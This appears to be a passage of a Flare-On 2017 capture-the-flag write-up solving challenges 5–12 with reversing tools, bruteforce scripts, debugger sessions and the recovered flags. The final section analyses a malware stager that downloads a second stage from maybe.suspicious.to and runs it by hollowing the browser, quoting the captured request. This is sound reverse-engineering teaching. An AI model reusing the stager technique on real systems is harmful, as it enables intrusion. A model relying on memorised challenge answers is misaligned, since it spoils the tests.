You're doing great. Let's take a break from all these hard challenges and play a little game.
Solution
pewpewboat.exe is not a PE file but an
x64 ELF that starts a nice ASCII implementation
of the Battleship game.
root@kali2:/ctf/flareon_2017/5 # ./pewpewboat.exe
Loading first pew pew map...
   1 2 3 4 5 6 7 8
  _________________
A |_|_|_|_|_|_|_|_|
B |_|_|_|_|_|_|_|_|
C |_|_|_|_|_|_|_|_|
D |_|_|_|_|_|_|_|_|
E |_|_|_|_|_|_|_|_|
F |_|_|_|_|_|_|_|_|
G |_|_|_|_|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Seaman Recruit

Welcome to pewpewboat! We just loaded a pew pew map, start shootin'!

Enter a coordinate:
The binary starts by initializing the PRNG with the current timestamp, then allocates a 0x240-byte buffer in the heap and populates it randomly. It then enters a game loop, where the player (us) has 0x64 attempts to win.
Inside the loop, the function play() (at 0x4038d6) is called; it prints the game grid and displays whether your shot was a hit or a miss. The coordinates themselves are read by the function enter_coor() (at 0x40377d).
So if we want to win, we need to
- disable the randomness of the game board
- determine which values are being compared when we enter coordinates
To disable the randomness, I simply used the LD_PRELOAD variable with a homemade shared library that overrides calls to time() and rand() with deterministic output:
// Compile with : $ gcc -shared -fPIC disable_time.c -o disable_time.so
// Load in GDB with: gef➤ set environment LD_PRELOAD=disable_time.so
#include <time.h>
#include <stdlib.h>

time_t time(time_t *t){ return 0; }
int rand(void){ return 0; }
With randomness out of the way, the board and the positions of all the ships will be the same at every run.
The function draw_grid() is called with a pointer to the game board as parameter. By reading it, the function knows how to print each cell (empty or full) and therefore knows the configuration of the board.
gef➤ bp *0x403c3a
gef➤ dps $rdi l1
0x0000000000614010│+0x00: 0x0008087808087800  ←  $rax, $rdi
This is a bitmask representing the layout of the board. To make things easier, I wrote a Python function to convert this value into a list of positions on the board:
>>> def convert_to_solution(rdi):
...     line = bin(rdi)[2:].rjust(64, '0')
...     table = [line[i:i+8] for i in range(0, len(line), 8)][::-1]
...     for i in range(len(table)):
...         row = table[i][::-1]
...         for j in range(len(row)):
...             if row[j] == '1':
...                 print("%c%c " % (chr(i + ord('A')), str(j + 1)), end="")
...             else:
...                 print(" ", end="")
...         print("")
...
>>> convert_to_solution(0x0008087808087800)
   B4 B5 B6 B7
   C4
   D4
   E4 E5 E6 E7
   F4
   G4
>>>
We get 2 things: one, we have all the positions of the enemy boats; two, the disposition of the boats on the board forms an ASCII letter (here 'F').
By advancing through all the levels, we can collect more letters:
- 0x0008087808087800 → “f”
- 0x008888f888888800 → “h”
- 0x7e8181f10101817e → “g”
- 0xf090909090000000 → “u”
- 0x0000f8102040f800 → “z”
- 0x0000000905070907 → “r”
- 0x7010701070000000 → “e”
- 0x0006090808083e00 → “j”
- 0x1028444444000000 → “v”
- 0x0c1212120c000000 → “o”
Reaching the final level and entering the valid positions of boats gets a message:
Final answer:
Aye! You found some letters did ya? To find what you're looking for,
you'll want to re-order them: 9, 1, 2, 7, 3, 5, 6, 5, 8, 0, 2, 3, 5, 6, 1, 4.
Next you let 13 ROT in the sea!
THE FINAL SECRET CAN BE FOUND WITH ONLY THE UPPER CASE.
Thanks for playing!
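A few lines of Python apply the re-ordering and the ROT13 step (the letters are taken from the ten boards above, in board order):

import codecs

letters = "fhguzrejvo"  # one letter per board, in the order listed above
order = [9, 1, 2, 7, 3, 5, 6, 5, 8, 0, 2, 3, 5, 6, 1, 4]
s = "".join(letters[i] for i in order)
print(s)                                  # ohgjurervfgurehz
print(codecs.encode(s.upper(), "rot13"))  # BUTWHEREISTHERUM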
Applying this formula gives ohgjurervfgurehz, which uppercased and ROT13-ed is BUTWHEREISTHERUM. Give this password as input and, after a bit of computation time, obtain the key to finish the level:
Challenge 6
Instruction
I hope you enjoyed your game. I know I did. We will now return to the topic of cyberspace electronic computer hacking and digital software reverse engineering.
Solution
payload.dll is a PE32+ x86-64 DLL. The DLL doesn't reveal much info out of the box, so I decided to use both dynamic and static analysis. Although the static part is perfectly handled by IDA, I wanted the dynamic analysis to be custom, so I had to make a small loader for this library.
Since the Microsoft x64 calling convention is used, the first four arguments are passed in registers in the following order: rcx, rdx, r8, r9.
#include <windows.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define DLL_LOCATION TEXT("F:\\flareon_2017\\6\\payload.dll")

typedef void (__stdcall *FuncType)(uint64_t, uint64_t, uint64_t, uint64_t);

/* Forward declaration so CallWithArgs() can use it. */
VOID PrintDebug(LPTSTR pMsgFmt, va_list* pArgs);

/* Call the location at `addr` with [a1 .. a4] as arguments. */
void CallWithArgs(uintptr_t addr, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4)
{
    PrintDebug("[+] calling %1!p!\n", (va_list*)&addr);
    DebugBreak();
    ((FuncType)(addr))(a1, a2, a3, a4);
}

/* Print debug message directly in WinDBG. */
VOID PrintDebug(LPTSTR pMsgFmt, va_list* pArgs)
{
    CHAR pMsg[128] = {0,};
    FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ARGUMENT_ARRAY,
                  pMsgFmt, 0, 0, pMsg, sizeof(pMsg), (va_list*)pArgs);
    OutputDebugString(pMsg);
    return;
}

/* main() */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    HMODULE handle = LoadLibraryEx(DLL_LOCATION, NULL, 0);
    PrintDebug("[+] DLL allocated at %1!p!\n", (va_list*)&handle);
    DebugBreak();

    /* do more stuff here */

    FreeLibrary(handle);
    return 0;
}
With this simple library loader, I have an accurate way of invoking any location within the DLL and displaying runtime information directly inside WinDBG.
IDA quickly pointed me to the function at offset 0x5A50, which I've called Func3(). The loop at 0x180005B05 is a simple strcmp()-like loop comparing arg1 (which we control) to a value from the DLL.
When WinDBG breaks at this location, we can get the value our argument is compared to:
0:000> bp payload+0x5b05
0:000> g
Breakpoint 0 hit
payload+0x5b05:
000007fe`f38e5b05 0fb610  movzx edx, byte ptr [rax] ds:000007fe`f38e4240=6f
0:000> da rax
000007fe`f38e4240  "orphanedirreproducibleconfidence"
000007fe`f38e4260  "s"
Using the loader, we can now invoke this function easily:
// inside WinMain
uintptr_t Func3 = handle + 0x5A50;
PCHAR a3 = "orphanedirreproducibleconfidences";
CallWithArgs(Func3, 0, 0, a3, 0);
Which, when compiled and executed, triggers the following MessageBox:
We get one letter of the key! A good start, but how can we get more? And why do we get the 26th character? To know that, we must understand the function at 0x180005D30:
This function gets a pointer to the Export Directory table then calls the function 0x180004710:
.text:000000018000471E    mov     [rsp+48h+var_18], rax
.text:0000000180004723    lea     rcx, [rsp+48h+SystemTime] ; lpSystemTime
.text:0000000180004728    call    cs:GetSystemTime
.text:000000018000472E    movzx   eax, [rsp+48h+SystemTime.wMonth]
.text:0000000180004733    movzx   ecx, [rsp+48h+SystemTime.wYear]
.text:0000000180004738    add     eax, ecx
.text:000000018000473A    cdq
.text:000000018000473B    mov     ecx, 1Ah
.text:0000000180004740    idiv    ecx
.text:0000000180004742    mov     eax, edx
Or better, in pseudo-code:
GetSystemTime(&SystemTime);
return (SystemTime.wYear + SystemTime.wMonth) % 0x1a;
Since Flare-On runs from September 2017 to October 2017, the possible return values are 24 if executed in September, or 25 if in October. We now know why we got key[25], but we don't know where the passphrase comes from. That part is done by the function at 0x180005C40, which decodes a part of .rdata at the index given by the return value of the function at 0x180004710.
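A quick sanity check of the index for the contest window:

# (wYear + wMonth) % 0x1a for the two months the contest runs
for year, month in [(2017, 9), (2017, 10)]:
    print((year + month) % 0x1a)  # prints 24, then 25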
So to get the keys, we must decode all sections in
.rdata:
for (int i = 0; i <= 24; i++){
    uint64_t DecodeRdataFunc = 0x5D30;
    uintptr_t addr = handle + DecodeRdataFunc;
    CallWithArgs(addr, i, p2, p3, p4);
}
The following passphrases are collected:
PCHAR pPasswords[] = {
    "filingmeteorsgeminately",               "leggykickedflutters",
    "incalculabilitycombustionsolvency",     "crappingrewardsanctity",
    "evolvablepollutantgavial",              "ammoniatesignifiesshampoo",
    "majesticallyunmarredcoagulate",         "roommatedecapitateavoider",
    "fiendishlylicentiouslycolouristic",     "sororityfoxyboatbill",
    "dissimilitudeaggregativewracks",        "allophoneobservesbashfulness",
    "incuriousfatherlinessmisanthropically", "screensassonantprofessionalisms",
    "religionistmightplaythings",            "airglowexactlyviscount",
    "thonggeotropicermines",                 "gladdingcocottekilotons",
    "diagrammaticallyhotfootsid",            "corkerlettermenheraldically",
    "ulnacontemptuouscaps",                  "impureinternationalisedlaureates",
    "anarchisticbuttonedexhibitionistic",    "tantalitemimicryslatted",
    "basophileslapsscrapping",               "orphanedirreproducibleconfidences"
};
And then force-call the Func3() function with each specific password:
addr = mz + Func3;
p3 = (uint64_t)pPasswords[i];
CallWithArgs(addr, p1, p2, p3, p4);
That will print out the key parts one by one via successive MessageBox calls.
0x77, 0x75, 0x75, 0x75, 0x74, 0x2d, 0x65, 0x78,
0x70, 0x30, 0x72, 0x74, 0x73, 0x40, 0x66, 0x6c,
0x61, 0x72, 0x65, 0x2d, 0x6f, 0x6e, 0x2e, 0x63,
which translated gives
wuuut-exp0rts@flare-on.com
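As a quick check, the bytes above decode directly (the listing appears truncated; the final "om" is cut off):

key = bytes([0x77, 0x75, 0x75, 0x75, 0x74, 0x2d, 0x65, 0x78,
             0x70, 0x30, 0x72, 0x74, 0x73, 0x40, 0x66, 0x6c,
             0x61, 0x72, 0x65, 0x2d, 0x6f, 0x6e, 0x2e, 0x63])
print(key.decode() + "om")  # wuuut-exp0rts@flare-on.com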
Challenge 7
Instruction
I want to play another game with you, but I also want you to be challenged because you weren't supposed to make it this far.
Solution
zsud.exe is a PE32 binary. Running
strings and
binwalk against it immediately shows 2 things:
- this binary is C# compiled
- it embeds a DLL
$ binwalk zsud.exe

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Microsoft executable, portable (PE)
[...]
356528        0x570B0         Microsoft executable, portable (PE)
362328        0x58758         Base64 standard index table
This DLL, flareon.dll, can be easily extracted with a simple dd command, and shows some strings like "soooooo_sorry_zis_is_not_ze_flag", but nothing really interesting (yet). Debugging the binary with dnSpy gives a whole new view of what it's doing: the function Smth() receives a Base64-encoded string, which once decoded is AES-decrypted with the key "soooooo_sorry_zis_is_not_ze_flag". The result is a PowerShell script that is then invoked, and which implements another maze game, entirely written in PowerShell. The script can be downloaded here.
The game is an escape room, so it would make sense that the flag will be given to us if we escape! And since it's a maze, we need to find the proper directions, which come in 2 parts.
First part of the directions
Getting the first part of the directions is relatively simple. zsud.exe starts a webservice on 127.0.0.1:9999, so it is possible to bruteforce the first directions by generating HTTP requests and analysing the output:
import requests

def send(directions, description, verbose=False):
    # base URL reconstructed from the service on 127.0.0.1:9999 mentioned
    # above; the exact path is an assumption, the k/e parameters are not
    url = "http://127.0.0.1:9999/?k={k:s}&e={e:s}".format(k=directions, e=description)
    h = requests.get(url)
    if h.status_code == 200 or "@" in h.text:
        return h.text
    return None

key_directions = {0: "n", 1: "s", 2: "e", 3: "w", 4: "u", 5: "d"}
directions = ""
d = key_desc.split()[-1]   # key_desc: initial room description from the game
prefix = []
i = 0
while True:
    valid = False
    for c in key_directions.keys():
        temp = directions + key_directions[c]
        desc = d.replace('+', '-').replace('/', '_').replace('=', '%3D')
        p = send(temp, desc)
        if p:
            directions = temp
            p, s = p.split()
            prefix.append(p)
            print("[!] dir='%s' prefix='%s' next='%s...'" % (directions, ' '.join(prefix), s[:16]))
            d = s
            valid = True
    if not valid:
        break
    i += 1
And we start getting the beginning of the path:
directions ='wnneesssnewne' prefix = 'You can start to make out some words but you need to follow the'
Second part of the directions
By following the directions found above, we end up in the "infinite maze of cubicles" (confirmed by the PowerShell script). The cubicles are linked to one another through random connections. To find the way, we must be able to predict the random generation. At line 431 we see that if we transfer the key (located in the desk drawer), the script triggers a call to srand(42). The implementation of msvcrt::rand() is a well-known algorithm that goes along the lines of:
seed = 42 def rand(): global seed new_seed = (0x343fd * seed + 0x269ec3) & ((1 << 32) - 1) randval = (new_seed >> 0x10) & 0x7fff seed = new_seed return randval
Which now makes the path predictable, and we get the final directions:
directions += 'ewwwdundundunsuneunsewdunsewsewsewsewdun'
Final wrap-up
If we now follow the entire directions found above, wnneesssnewne + ewwwdundundunsuneunsewdunsewsewsewsewdun, we get the final message RIGHT_PATH!@66696e646b6576696e6d616e6469610d0a, so the complete answer to the maze is
directions ='wnneesssnewneewwwdundundunsuneunsewdunsewsewsewsewdun' prefix = 'You can start to make out some words but you need to follow the RIGHT_PATH!@66696e646b6576696e6d616e6469610d0a'
But still no flag. The hex-encoded block right next to RIGHT_PATH tells us to:
>>> "66696e646b6576696e6d616e6469610d0a".decode('hex') 'findkevinmandia\r\n'
Going back to the PowerShell script in PowerShell ISE, we notice that the only place Kevin is mentioned is in the function Invoke-Say(). So we force its if branch to be taken by setting the $helmet variable to something non-null, and $key to the path we found:
$key = "You can start to make out some words but you need to follow the RIGHT_PATH!@66696e646b6576696e6d616e6469610d0a" $helmet = 1;
Then execute only this portion of code to see:
Which unhexlified gives the flag:
>>> "6d756464316e675f62795f7930757235336c706840666c6172652d6f6e2e636f6d".decode('hex') mudd1ng_by_y0ur53lph@flare-on.com
Challenge 8
Instruction
You seem to spend a lot of time looking at your phone. Maybe you would finish a mobile challenge faster. I want to play another game with you, but I also want you to be challenged because you weren't supposed to make it this far.
Solution
This really fun challenge offers an Android APK file, flair.apk. The static analysis was done exclusively with JADX, and I used the awesome GenyMotion + jdb combo for the dynamic analysis.
This app presents itself as a traditional Android app,
com.flare_on.flair:
You can get the final flag by solving the 4 mini challenges:
1. Michael 2. Brian 3. Milton 4. Printer
1. Michael
Using JADX, we can easily reach the method com.flare_on.flair.Michael.checkPassword() and simply solve it:
Which trivially gives us the first answer:
MYPRSHE__FTW
2. Brian
Using jdb, it is possible to break at any location inside a running Android app. JADX shows that when the validation button is clicked, the method com.flare_on.flair.Brian.teraljdknh() is called and checked for success. This function is a simple memcmp()-like function, so we can break on it and dump its arguments:
$ jdb -attach localhost:8700 > methods com.flare_on.flair.Brian [...] com.flare_on.flair.Brian dfysadf(java.lang.String, int, java.lang.String,java.lang.String) com.flare_on.flair.Brian teraljdknh(java.lang.String, java.lang.String) [...] > stop in com.flare_on.flair.Brian.teraljdknh (when break hits) > locals Method arguments: v = "AAAA" Local variables: m = "hashtag_covfefe_Fajitas!"
We get the answer:
hashtag_covfefe_Fajitas!
3. Milton
In the Milton class, we can see that the input field is not enabled unless the rating is equal to 4 (i.e. giving 4 stars).
The onClick event calls the method breop(<given_password>), which compares our input with the result of a call to nbsadf(). nbsadf() does nothing but call Stapler.poserw(). So let's break on that with jdb:
> stop in com.flare_on.flair.Stapler.poserw (wait for it) > main[1] dump intr intr = { 65, 32, 114, 105, 99, 104, 32, 109, 97, 110, 32, 105, 115, 32, 110, 111, 116, 104, 105, 110, 103, 32, 98, 117, 116, 32, 97, 32, 112, 111, 111, 114, 32, 109, 97, 110, 32, 119, 105, 116, 104, 32, 109, 111, 110, 101, 121, 46 } > stop in java.util.Arrays.equals(byte[], byte[])
The variable intr holds our answer: A rich man is nothing but a poor man with money. Once decoded, we see that Stapler.poserw() is nothing more than a SHA1 checksumming function. So the answer is:
>>> import hashlib >>> hashlib.sha1('A rich man is nothing but a poor man with money.').hexdigest() 10aea594831e0b42b956c578ef9a6d44ee39938d
4. Printer
The check in the Printer class follows the same principles as the ones covered in Milton. After deobfuscation, we can see that the check is also performed against Stapler.poserw(). So we use jdb to break and dump the values:
> stop in java.util.Arrays.equals(byte[], byte[]) > stop in com.flare_on.flair.Stapler.poserw
And we get:
>>> import hashlib >>> hashlib.sha1("Give a man a fire and he'll be warm for a day. Set a man on fire and he'll be warm for the rest of his life.") 5f1be3c9b081c40ddfc4a0238156008ee71e24a4
And finally:
Challenge 9
Instruction
One of our computer scientists recently got an Arduino board. He disappeared for two days and then he went crazy. In his notebook he scrawled some insane jibberish that looks like HEX. We transcribed it, can you solve it?
Solution
The challenge is a text file named remorse.ino.hex. This format (Intel HEX) is frequently used for sharing encoded firmware, and the python-intelhex module provides a useful script to convert it back to binary (hex2bin.py). From the strings inside the firmware, we learn that it is meant to be used on an Arduino Uno board. This board embeds an Atmel AVR 8-bit CPU running at 16MHz. Easily enough, Google points us to the datasheet of the processor.
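The same conversion can also be scripted directly against the python-intelhex API (a sketch; file names assumed):

from intelhex import IntelHex

ih = IntelHex("remorse.ino.hex")    # parse the Intel HEX records
print("firmware range: 0x%x-0x%x" % (ih.minaddr(), ih.maxaddr()))
ih.tobinfile("remorse.bin")         # dump the raw AVR firmware image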
Being totally new to AVR, I paused the challenge at that point long enough to read a good part of the datasheet, which proved to be extremely useful for the rest of this exercise.
With a much better understanding of AVR, I set up a SimAVR environment and also compiled simduino, which allowed me to connect GDB to it and debug the runtime:
$ obj-x86_64-linux-gnu/simduino.elf -d -v -v ../../../remorse.ino.hex
Simduino will open a /dev/pts that can be used for UART (so we can use tools like picocom or minicom to debug it).
The firmware seems to be expecting a new PIN configuration: luckily I came across this information in the datasheet ("35. Register Summary").
After trying to manipulate the PINB and PINC (resp. at offset 0x23 and 0x26) without success, I saw that a change of value in PIND (offset 0x29) immediately provoked a response from the firmware:
$ avr-gdb -q -ex 'target remote localhost:1234' [...] (gdb) set {char}0x29=0
In
picocom:
Flare-On 2017 Adruino UNO Digital Pin state:0
Since the possible values are limited to 1 byte (8 bits), and being lazy, I wrote a GDB script to bruteforce all the values:
set $_i = 0 define inc_pind set $_i = $_i + 1 set {char}0x29=$_i continue end
And then I used xdotool to programmatically send the right xkeysym commands to the GDB terminal:
$ i=0; while [ $i -lt 256 ]; do sleep 5 ; xdotool key ctrl+c Up Return ; i=$((i + 1)); done
I went for a coffee, and when I came back I saw the pleasant screen:
This challenge was a good reminder that reading the documentation first saved me probably hours of not understanding how the CPU was getting input/output data from the PINs or what the ABI was doing. So, more than ever: RTFM!
Challenge 10
Instruction
We have tested you thoroughly on x86 reversing but we forgot to cover some of the basics of other systems. You will encounter many strange scripting languages on the Information Superhighway. I know that Interweb challenges are easy, but we just need you to complete this real quick for our records.
Solution
Another guessing-game type of challenge. It comes as a PHP script named shell.php and was solvable in 3 different steps:
Step 1: get the key length
This script is a mess so the cleaned version was pushed here.
This challenge is not about cracking the MD5 hash given, but reversing the way
the variable
$block is manipulated with the XOR operation. We don’t know the
key
$param, including its length. However, we do know that after L4 the
strlen($param) will be in [32..64]. Additionally, we know after this line that
every byte of
$param is in the hexadecimal namespace (“0123456789abcdef”). And
finally, because of the call
to
create_function
line 15, we know that the block once de-XOR-ed will have all bytes in
string.printable.
Now the guessing game starts: we must guess the length and the key at the same time. The idea, in pseudo-code:
assuming len(key) == 32
charset = "0123456789abcdef"
for each candidate c in charset:          # candidate for key[0]
    test if c ^ block[0] in string.printable and \
        c ^ block[0 + len(key)] in string.printable and \
        c ^ block[0 + 2*len(key)] in string.printable and \
        etc.
    if any test fails: reject candidate
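A minimal concrete sketch of that filter, assuming the raw bytes of $block were dumped to a file (the file name is hypothetical):

import string

HEXCHARS = "0123456789abcdef"

def candidates_per_position(block, key_len):
    """Return, for each key position, the hex chars that decode every
    covered byte of block to something printable (None if impossible)."""
    out = []
    for pos in range(key_len):
        ok = [c for c in HEXCHARS
              if all(chr(ord(c) ^ block[i]) in string.printable
                     for i in range(pos, len(block), key_len))]
        if not ok:
            return None        # this key length is impossible
        out.append(ok)
    return out

# block = open("block.bin", "rb").read()     # hypothetical dump of $block
# viable = [n for n in range(32, 65) if candidates_per_position(block, n)]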
This gives us a good iteration pattern, allowing us to narrow down all possible values and find the possible length for the key, as done in bf1.py:
$ python bf1.py pos=0 char='c' len=64 pos=0 char='d' len=64 pos=0 char='e' len=64 pos=1 char='a' len=64 pos=1 char='b' len=64 pos=1 char='c' len=64 pos=1 char='d' len=64 pos=1 char='e' len=64 pos=2 char='0' len=64 pos=2 char='1' len=64 pos=2 char='2' len=64 pos=2 char='3' len=64 [...]
Unanimously, we find that if the length of $param is 64 bytes, we have at least one candidate that ensures we can de-xor $block and get ASCII back for each byte of the key.
So if
$param = md5($param) . substr(MD5(strrev($param)), 0, strlen($param));
and strlen($param) == 64, it means that our key o_o is 32 bytes long, which is way too large to bruteforce. Consequently, we must un-xor the block some other way, without knowing the key.
Step 2: unxor all the blocks!
Step 1 gave us the key length along with a list of potential candidates for each position ([0, 63]). This second step directly extends the earlier one by bruteforcing the key chunk by chunk. The main idea:
possible_candidates = {0: "abc", 1: "012", 2: "f", etc...} possible_block = [] block_size = 4 # pure assumption for candidate in generate_all_candidates( possible_candidates[0:block_size] ): if candidate ^ block[key_length*0:key_length*0 + 4] in string.printable and \ candidate ^ block[key_length*1:key_length*1 + 4] in string.printable and \ candidate ^ block[key_length*2:key_length*2 + 4] in string.printable and \ etc.. : possible_block.append(candidate)
I used Python’s
itertools.product to generate all the candidate blocks, and
little by little recovered the value for
$param:
$ python bf2.py possible_key=de6952b84a49b934acb436418ad9d93d237df05769afc796d063000000000000 (0, '$c=\'\';\r\n$key = "";\r\nif (isset($_POST[\'o_o\']))\r\n $ka') (64, 'oXo\'];\r\nif (isset($_POST[\'hint\']))\r\n $d = "*') (128, "stet($_POST['t'])) {\r\n if ($_POST['t'] == 'c') {\r\n$") (192, "63_decode('SDcGHg1feVUIEhsbDxFhIBIYFQY+VwMWTyAcOhEYE") (256, 'DJXTWxrSH4ZS1IiAgA3GxYUQVMvBFdVTysRMQAaQUxZYTlsTg0MA') (320, 'whbXgcxHQRBAxMcWwodHV5EfxQfAAYrMlsCQlJBAAAAAAAAAAAAE') [...]
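A sketch of that chunk-wise search (cands being the per-position candidate lists from step 1; all names here are mine):

import itertools, string

def is_printable(b):
    return chr(b) in string.printable

def solve_chunk(block, key_len, cands, start, size=4):
    """Bruteforce one chunk of the key: cands[p] is the list of candidate
    chars for key position p, narrowed down in step 1."""
    good = []
    for combo in itertools.product(*cands[start:start + size]):
        ok = all(is_printable(ord(c) ^ block[i])
                 for j, c in enumerate(combo)
                 for i in range(start + j, len(block), key_len))
        if ok:
            good.append("".join(combo))
    return good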
After a few iterations, it appeared that the encoded block contains not just pure PHP but also HTML, which allowed me to refine the condition for finding a valid candidate.
After many iterations, we get the value of $param:
$param = "db6952b84a49b934acb436418ad9d93d237df05769afc796d067bccb379f2cac";
Step 3
Entering the correct value for $param found in step 2 allows us to discover the decoded script passed to create_function().
And back to square one: we have 3 new base64-encoded blocks to decode. Depending on the value given in $_POST['t'] (which can be 'c', 's' or 'w'), the script will split the key every 3 characters, starting from index 0, 1, or 2 respectively.
I made a big assumption here, which was that $key would be the flag ending the challenge. Therefore, even though we don't know its length (yet), we know that it ends with @flare-on.com.
So for this step, I used the same technique as in step 2, but split the key every 3 characters and checked whether the block of bytes was successfully decoded.
key = "fla"+"re-"+"on."+"com" for j in range(3): k = key[j::3] for i in range(11): x = xor( b64d(c), "A"*i+k)[i::i+len(k)] if is_all_printable(x): print j, i, repr(x)
Just like step 1, this approach gives us 2 possible lengths for the flag prefix (i.e. before @flare-on.com): 8 or 9 bytes.
So there again, semi-manual bruteforce:
i = 9 k0 = key[0::3] for t in string.printable: p = "A"*(i-1) + t + k0 x = xor(b64d(c), p) b = all_printable_blocks(x, i-1, len(p), len(p)-(i-1)) if b != []: print p, b
We quickly notice that the output has some HTML in it, so we can discard candidates with invalid HTML patterns. For example:
➜ python bf.py AAAAAAAA0froc ['8titl', 'ged C', '`</ti', ')- Ma', "41' H", '\t\n<bo', 'pext=', 'klor=', 'kd0="', '0froc', '$titl', 'phieu', 'anri"', 'gript', 'perva', '/=7,i', "X\\n';", '/=P[i', 'n-j+n', '6])j=', 'jerHT', 'ge(4)', '+scri', 'kdy>\r'] AAAAAAAA2froc [':titl', 'eed C', 'b</ti', '+- Ma', "61' H", '\x0b\n<bo', 'rext=', 'ilor=', 'id0="', '2froc', '&titl', 'rhieu', 'cnri"', 'eript', 'rerva', '-=7,i', "Z\\n';", '-=P[i', 'l-j+n', '4])j=', 'herHT', 'ee(4)', ')scri', 'idy>\r'] AAAAAAAA3froc [';titl', 'ded C', 'c</ti', '*- Ma', "71' H", '\n\n<bo', 'sext=', 'hlor=', 'hd0="', '3froc', "'titl", 'shieu', 'bnri"', 'dript', 'serva', ',=7,i', "[\\n';", ',=P[i', 'm-j+n', '5])j=', 'ierHT', 'de(4)', '(scri', 'hdy>\r'] AAAAAAAA4froc ['<titl', 'ced C', 'd</ti', '-- Ma', "01' H", '\r\n<bo', 'text=', 'olor=', 'od0="', '4froc', ' titl', 'thieu', 'enri"', 'cript', 'terva', '+=7,i', "\\\\n';", '+=P[i', 'j-j+n', '2])j=', 'nerHT', 'ce(4)', '/scri', 'ody>\r'] AAAAAAAA5froc ['=titl', 'bed C', 'e</ti', ',- Ma', "11' H", '\x0c\n<bo', 'uext=', 'nlor=', 'nd0="', '5froc', '!titl', 'uhieu', 'dnri"', 'bript', 'uerva', '*=7,i', "]\\n';", '*=P[i', 'k-j+n', '3])j=', 'oerHT', 'be(4)', '.scri', 'ndy>\r'] [...]
Only the code with key=AAAAAAAA4froc makes sense, so that must be it. We'll assume this is how the key ends, bruteforce the byte before it, and so on, and so forth. Reiterating this for all bytes, we get the first subkey: k0='t_rsaat_4froc'.
And reiterating the exact same thing for the 2nd and 3rd base64-encoded blocks, we get all the subkeys:
>>>>>>>>> ''.join([''.join(x) for x in zip(k0, k1, k2)]) 'th3_xOr_is_waaaay_too_w34k@flare-on.com'
Challenge 11
Instruction
Only two challenges to go. We have some bad hombres here but you're going to get the keys out.
Solution
This challenge was out of this world, and so much fun! It comes as a PE32 file named covfefe.exe.
The most notable string from the PE points us nostalgically to Rick Astley's timeless masterpiece, "Never Gonna Give You Up".
Many other strings appear, but are weirdly aligned to one DWORD per character:
Actually covfefe.exe is very simple, and only asks for a correct password. The PE itself only:
- randomly chooses an integer in [0, 9[ and stores it at 0x0403008 + 0x110*4
- starts the VM itself at 0x0403008, and jumps to it
The VM is an array of int32_t, so:
logical_addr_in_pe = 0x0403008 + relative_addr_in_vm * 4
The execution of the virtual machine starts at pc_start = vm + 0x463, and each instruction is executed in the same way:
execute_instruction(op1, op2, op3) {
    [op2] = [op2] - [op1]
    if [op2] <= 0 && op3 != -1:
        pc = op3   // jump
}
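In other words, this is a subleq machine. A minimal Python interpreter for these semantics (a sketch: the dump name comes from the WinDBG command below, the 2-int skip moves from 0x403000 to the VM base at 0x403008, and the real VM's memory-mapped I/O for reading the password is omitted):

import struct

def load_vm(path, skip=2):
    data = open(path, "rb").read()
    words = list(struct.unpack("<%di" % (len(data) // 4), data))
    return words[skip:]          # dump starts at 0x403000, VM at 0x403008

def to_i32(x):
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x & 0x80000000 else x

def run_subleq(mem, pc=0x463):
    while 0 <= pc < len(mem) - 2:
        a, b, c = mem[pc], mem[pc + 1], mem[pc + 2]
        mem[b] = to_i32(mem[b] - mem[a])
        pc = c if (mem[b] <= 0 and c != -1) else pc + 3

# mem = load_vm("dumpmem-00403000-L5000.dmp")
# run_subleq(mem)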
Since the code is super easy, I decided to recreate the C source code from it. So first, I used WinDBG to dump the VM location:
0:000> .writemem F:\flareon_2017\11\dumpmem-00403000-L5000.dmp
And I used this to create a C program that would run the VM as well, so that I could set breakpoints and analyse the VM more precisely. I also used Binary Ninja to write a new custom architecture, which greatly helped tracking down operations at the bytecode level of the VM.
We know that we must provide a good password to validate the task, so there must be a comparison that fails as soon as a wrong character is entered. Those new tools were of great help in identifying the culprit: the comparison instruction is done in the block at 0xde6.
Now that we know that, all I needed was to use the C program to "set a breakpoint" at 0xde9 and see what value was expected.
Knowing this, creating the bruteforce script (cov.py) was the next immediate step:
And finally we recover the key to this level: subleq_and_reductio_ad_absurdum.
Challenge 12
Instruction
Sorry, we don't have a challenge for you. We were hacked and we think we lost it. Its name was "lab10" . The attacker left one binary behind and our sophisticated security devices captured network traffic (pcap) that may be related. If you can recover the challenge from this and solve it then you win the Flare-On Challenge. If you can't then you do not win it.
Solution
This level alone could have been an entire CTF. It came as 2 files:
- an 85KB PE32 file,
coolprogram.exe
- a 5.5MB PCAP trace,
20170801_1300_filtered.pcap
Extracting secondstage.exe
coolprogram.exe is a Borland-compiled PE file that is nothing more than a stager to download and execute the real payload. Using API Monitor, we can trace that it attempts to connect to the FQDN maybe.suspicious.to, also checking that the domain name doesn't point to localhost.
The behavior seems consistent with the first TCP stream of the PCAP. However, the data received seems encoded/encrypted:
GET /secondstage HTTP/1.1 Accept: */* Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: maybe.suspicious.to Cache-Control: no-cache HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.7.12 Date: Tue, 01 Aug 2017 17:04:02 GMT Content-type: application/octet-stream Content-Length: 119812 Last-Modified: Tue, 01 Aug 2017 14:46:13 GMT 7.=|...WEz.....:&.uBLA.5.su..m..>j.-....4..|.....Mu%R{.......U..(Fl.;./.....QM.G...O [...]
IDR and IDA helped identify the "real main" function at 0x04103DC, which sequentially performs the following operations:
- unxor the URL from memory: the URL is located at 0x04102B4 and xor-ed with 0x73 (see the sketch below)
- perform the HTTP GET request to fetch the secondstage
- decode the buffer, recovering a valid PE file, secondstage.exe
- invoke secondstage.exe by hollowing the default HTTP browser
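As a side note, the URL de-obfuscation in the first bullet is a single-byte XOR; a minimal sketch (the dump slice is hypothetical):

def unxor_url(blob, key=0x73):
    """Recover the C2 URL hidden at 0x04102B4 (xor-ed with 0x73)."""
    return bytes(b ^ key for b in blob).split(b"\x00")[0]

# blob = dump_of_coolprogram[0x2B4:0x2B4 + 0x80]   # hypothetical section offset
# print(unxor_url(blob).decode())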
